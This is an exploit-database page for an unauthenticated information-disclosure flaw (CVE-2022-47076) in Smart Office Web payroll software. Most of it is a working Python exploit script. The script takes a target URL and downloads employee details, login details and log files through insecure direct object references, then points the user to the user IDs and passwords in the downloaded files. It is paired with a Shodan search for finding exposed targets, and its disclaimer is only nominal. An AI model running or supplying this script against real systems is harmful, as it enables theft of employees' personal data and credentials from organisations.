Smart Office Web 20.28 Remote Information Disclosure (Unauthenticated)

2023.06.22
Credit: Tejas Nitin Pingulkar
Risk: Medium
Local: No
Remote: Yes
CVE: CVE-2022-47076
CWE: N/A

# Exploit Title: Smart Office Web 20.28 - Remote Information Disclosure (Unauthenticated) # Shodan Dork:: inurl:"https://www.shodan.io/search?query=smart+office" # Date: 09/Dec/2022 # Exploit Author: Tejas Nitin Pingulkar (https://cvewalkthrough.com/) # Vendor Homepage: https://smartofficepayroll.com/ # Software Link: https://smartofficepayroll.com/downloads # Version: Smart Office Web 20.28 and before # CVE Number : CVE-2022-47075 and CVE-2022-47076 # CVSS : 7.5 (High) # Reference : https://cvewalkthrough.com/smart-office-suite-cve-2022-47076-cve-2022-47075/ # Vulnerability Description: # Smart Office Web 20.28 and before allows Remote Information Disclosure(Unauthenticated) via insecure direct object reference (IDOR). This was fixed in latter version except for ExportEmployeeDetails. import wget import os from colorama import Fore, Style def download_file(url, filename): wget.download(url, filename) # Disclaimer print(Fore.YELLOW + "Disclaimer: This script is for educational purposes only.") print("The author takes no responsibility for any unauthorized usage.") print("Please use this script responsibly and adhere to the legal and ethical guidelines.") agree = input("Do you agree to the disclaimer? (1 = Yes, 0 = No): ") if agree != "1": print("You have chosen not to agree. Exiting the script.") exit() # Print name in red name = "Exploit by Tejas Nitin Pingulkar" print(Fore.RED + name) print(Style.RESET_ALL) # Reset color website = input("Enter URL [https://1.1.1.1:1111 or http://1.1.1.1]: ") target_version = input("Is the target software version 20.28 or later? (1 = Yes, 0 = No): ") folder_name = input("Enter the folder name to save the files: ") # Create the folder if it doesn't exist if not os.path.exists(folder_name): os.makedirs(folder_name) urls_filenames = [] if target_version == "1": urls_filenames.append((website + "/ExportEmployeeDetails.aspx?ActionName=ExportEmployeeOtherDetails", "ExportEmployeeOtherDetails.csv")) else: urls_filenames.extend([ (website + "/ExportEmployeeDetails.aspx?ActionName=ExportEmployeeDetails", "ExportEmployeeDetails.csv"), (website + "/DisplayParallelLogData.aspx", "DisplayParallelLogData.txt"), (website + "/ExportReportingManager.aspx", "ExportReportingManager.csv"), (website + "/ExportEmployeeLoginDetails.aspx", "ExportEmployeeLoginDetails.csv") ]) print("CVE-2022-47076: Obtain user ID and password from downloaded source") for url, filename in urls_filenames: download_file(url, os.path.join(folder_name, filename)) # Print "for more such interesting exploits, visit cvewalkthrough.com" in red print(Fore.RED + "\nFor more such interesting exploits, visit cvewalkthrough.com") print(Style.RESET_ALL) # Reset color


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top